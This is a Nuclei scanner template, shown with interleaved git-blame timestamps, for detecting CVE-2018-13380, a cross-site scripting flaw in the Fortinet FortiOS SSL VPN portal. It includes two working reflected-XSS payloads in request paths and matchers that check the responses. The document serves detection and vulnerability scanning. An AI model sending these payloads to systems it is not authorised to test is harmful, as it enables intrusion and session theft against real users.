2021-01-02 05:00:39 +00:00
id : CVE-2018-13380
2020-11-24 14:30:18 +00:00
info :
2022-08-19 20:44:38 +00:00
name : Fortinet FortiOS - Cross-Site Scripting
2022-01-28 10:16:21 +00:00
author : shelld3v,AaronChen0
2020-11-24 14:30:18 +00:00
severity : medium
2022-08-19 20:44:38 +00:00
description : Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.
2022-01-28 10:16:21 +00:00
reference :
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
2022-05-17 09:18:12 +00:00
- https://fortiguard.com/advisory/FG-IR-18-383
- https://fortiguard.com/advisory/FG-IR-20-230
2022-08-19 20:44:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
2024-01-29 17:11:14 +00:00
- https://github.com/merlinepedra25/nuclei-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-13380
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00122
2024-01-29 17:11:14 +00:00
epss-percentile : 0.46406
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : fortinet
product : fortios
tags : cve,cve2018,fortios,xss,fortinet
2020-11-24 14:30:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-11-24 14:30:18 +00:00
- method : GET
path :
2022-01-28 10:16:21 +00:00
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
2021-06-29 02:17:42 +00:00
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
2020-11-24 20:00:01 +00:00
matchers-condition : and
2020-11-24 14:30:18 +00:00
matchers :
- type : word
2022-01-28 10:16:21 +00:00
part : body
2020-11-24 14:30:18 +00:00
words :
- "<svg/onload=alert(1337)>"
2022-01-28 10:16:21 +00:00
- "<script>alert(1337)</script>"
condition : or
2020-11-24 20:00:01 +00:00
- type : word
2022-01-28 10:16:21 +00:00
part : header
2023-07-11 19:49:27 +00:00
negative : true
2020-11-24 20:00:01 +00:00
words :
- "application/json"
- type : status
status :
2021-02-17 14:44:40 +00:00
- 200
2024-01-30 06:46:18 +00:00
# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950